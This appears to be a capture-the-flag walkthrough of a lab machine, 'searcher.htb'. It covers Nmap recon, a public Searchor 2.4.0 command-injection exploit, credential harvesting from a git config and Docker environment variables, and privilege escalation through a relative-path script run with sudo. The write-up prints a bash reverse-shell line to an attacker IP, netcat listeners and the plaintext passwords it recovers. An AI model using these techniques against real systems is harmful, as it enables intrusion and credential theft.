IP: 10.129.228.217
Let's start with the Nmap scan.
nmap -sC -sV -o nmap 10.129.228.217
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-06 11:38 EST
Nmap scan report for 10.129.228.217
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.92 seconds
We can see that we have port 22 ssh and port 80 http open where it redirects to http://searcher.htb. Let's add that to the host file.
sudo nano /etc/hosts
let's now visit the webpage.
This site allows for queries to be made to other sites like Accuweather. At the bottom of the page, we can also see that they are using Flask and Searchor 2.4.0. Doing some Google search we found that it has a CVE assigned to it.
So, let's follow the POC and try to get a shell.
git clone https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection.git
./exploit.sh searcher.htb 10.10.14.104
Let's check our Netcat listener.
rlwrap nc -nlvp 9001
Let's get our first flag now.
Flag: 73510de022f7a3527af03bb9744427a8
Now let's escalate our privileges to get to root. Let's list out the files.
ls -la
we can see that there's a .git folder let's check if we can find something interesting there.
cd .git
Nice! We can see that a config file here might get some creds from it.
cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main
We got the SVC username which is cody and the password here jh1usoih2bkjaspwe92 . As we saw in the nmap scan SSH was open so let's log in using it.
ssh svc@10.129.228.217
And we're in. Let's first check the sudoer’s permission for the user.
sudo -l
So, the user has root access to run /usr/bin/python3 /opt/scripts/system-checkup.py *. Let's run this and see what do we get.
sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Let's use the 3rd option to perform a full system checkup
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
If we try to edit the system-checkup.py script we don't have the permissions.
Nothing interesting to be found here. If we recall the config file we can see that the creds were used on gitea.searcher.htb let's add that into our host’s file.
sudo nano /etc/hosts
So, let's check if we can find something interesting there.
We get the option to sign in let's use the creds we found.
And we're successfully able to log in. We can see here 2 users cody and administrator.
At Cody, we can see the source code for Searcher_site the website. Going a few steps back we missed out something.
We can see that we can use docker-inspect it to inspect some docker containers.
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
So, it follows a particular format. We can view the usage information of the docker inspect command here. If we follow this page shows how the format works. If I pass it {{ json [selector]}} then whatever I give in selector will pick what displays. If I just give it . as the selector, it displays everything, which I’ll pipe into jq to pretty print.
sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea | jq .
Going through the output we found something interesting.
},
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"USER_UID=115",
"USER_GID=121",
"GITEA__database__DB_TYPE=mysql",
"GITEA__database__HOST=db:3306",
"GITEA__database__NAME=gitea",
"GITEA__database__USER=gitea",
"GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"USER=git",
"GITEA_CUSTOM=/data/gitea"
],
Now, as we have MySQL creds let's try to log in but first, we need the IP of the database as well so let's get that.
sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .NetworkSettings.Networks}}' mysql_db | jq .
Let's log in now.
mysql -h 172.19.0.3 -u gitea -pyuiu1hoiu4i5ho1uh gitea
Let's first check for existing databases.
show databases;
gitea is the only interesting database we can find.
use gitea;
show tables;
The user table looks interesting so let's check that.
select * from user;
The output looks gibberish let's display specific columns only.
select name,email,passwd from user;
We got the hash for the administrator user. Before trying to crack the hash let's first try to log in to gitea using administrator and reusing the password we got for mysql database .
And we're logged in as Administrator. Let's check the Scripts we have on this repository.
So, we found the same scripts that we were trying to execute earlier let's do code analysis.
Checking the system-checkup.py script we can see that it just runs the mentioned 3 commands. But the interesting part is
elif action == 'full-checkup':
try:
arg_list = ['./full-checkup.sh']
print(run_command(arg_list))
print('[+] Done!')
except:
print('Something went wrong')
exit(1)
that while handling full-checkup it tries to run full-checkup.sh from the current directory so if we add anything to the full-checkup.sh file it runs as root if we start system-checkup.py full-checkup in the same directory. So, let's try this.
nano full-checkup.sh
Now we can update the script to include a reverse shell.
bash -i >& /dev/tcp/10.10.14.104/443 0>&1
Let's check our Netcat listener.
rlwrap nc -nlvp 443
Now let's get our root flag.
Flag: 36ea04a120e1d295ac9646a7dcc714ce